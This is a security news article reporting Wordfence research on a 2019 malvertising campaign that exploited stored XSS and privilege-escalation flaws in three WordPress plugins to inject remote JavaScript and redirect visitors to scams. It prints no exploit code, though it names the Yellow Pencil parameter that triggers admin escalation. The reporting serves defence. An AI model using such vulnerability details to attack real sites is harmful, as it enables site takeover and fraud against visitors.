Malvertising campaign exploits recently disclosed WordPress Plugin flaws

Pierluigi Paganini July 24, 2019

Experts at Defiant have uncovered a campaign that exploited recently disclosed plugin vulnerabilities to inject malware into websites.

Experts at Defiant, the company that developed the Wordfence security plugin for WordPress, uncovered a malvertising campaign that leverages recently disclosed plugin flaws to inject malicious code into websites.

Threat actors behind the malvertising campaign are leveraging known flaws in WordPress plugins such as “Coming Soon and Maintenance Mode,” “Yellow Pencil Visual CSS Style Editor” and “Blog Designer.”

Experts pointed out that these plugins are installed on thousands of websites.

The attackers inject a small piece of JavaScript code that is designed to fetch additional code from an external domain and execute it every time visitors browse to the compromised website.

“The Defiant Threat Intelligence team has identified a malvertising campaign which is causing victims’ sites to display unwanted popup ads and redirect visitors to malicious destinations, including tech support scams, malicious Android APKs, and sketchy pharmaceutical ads.” states the report published by WordFence. “By targeting a few recently disclosed WordPress plugin vulnerabilities, the attackers inject a JavaScript payload into the front end of a victim’s site. These injections each contain a short script which sources additional code from one or more third-party URLs. That code is executed when a visitor opens the victim website.”

malvertising campaign

Victims are initially redirected to a domain used to checks the type of device used by the visitors, then the malicious code redirects them to malicious destinations, including tech support scams, sites delivering malicious Android APKs, and sketchy pharmaceutical ads.

The hackers have exploited stored cross-site scripting (XSS) vulnerabilities in Blog Designerand Coming Soon and Maintenance Mode, and an unauthenticated arbitrary options update issue in the Yellow Pencil plugin.

“The Yellow Pencil vulnerability is notable because, in most configurations, an attacker could enable new user registrations with Administrator privileges, leading to takeover of vulnerable sites. Instead of taking the sites over entirely, these attackers seem satisfied with the malvertising campaign by itself. ” continues the report.

The experts revealed that the privilege escalation vulnerability in the Yellow Pencil Visual Theme Customizer plugin was exploited in a hacking campaign in April. The flaw could be exploited by attackers to update arbitrary options on vulnerable installations.

Experts at Wordfence observed a high volume of attempts to exploit the vulnerability after a security researcher publicly disclosed a proof of concept (POC) exploit code for a set of two software vulnerabilities affecting the plugin.

The privilege-escalation vulnerability exists in the yellow-pencil.php file. The file is used to check if the request parameter yp_remote_get has been set, and if it has, the plugin escalates the users’ privileges to that of an administrator.

An unauthenticated user could operate with admin privileges, for example, he could change arbitrary options.

“The majority of the XSS injection attempts tracked across this campaign were sent by IP addresses linked to popular hosting providers,” concludes the report. “With attacks sourced from IPs hosting several live websites, as well as our own evidence of infected sites associated with this campaign, it’s likely the threat actor is using infected sites to deliver XSS attacks by proxy.”

The researchers shared Indicators of Compromise and other technical details about this malvertising campaign in their analysis.

[adrotate banner=”9″] [adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – malvertising campaign, WordPress)

[adrotate banner=”5″]

[adrotate banner=”13″]

you might also like

leave a comment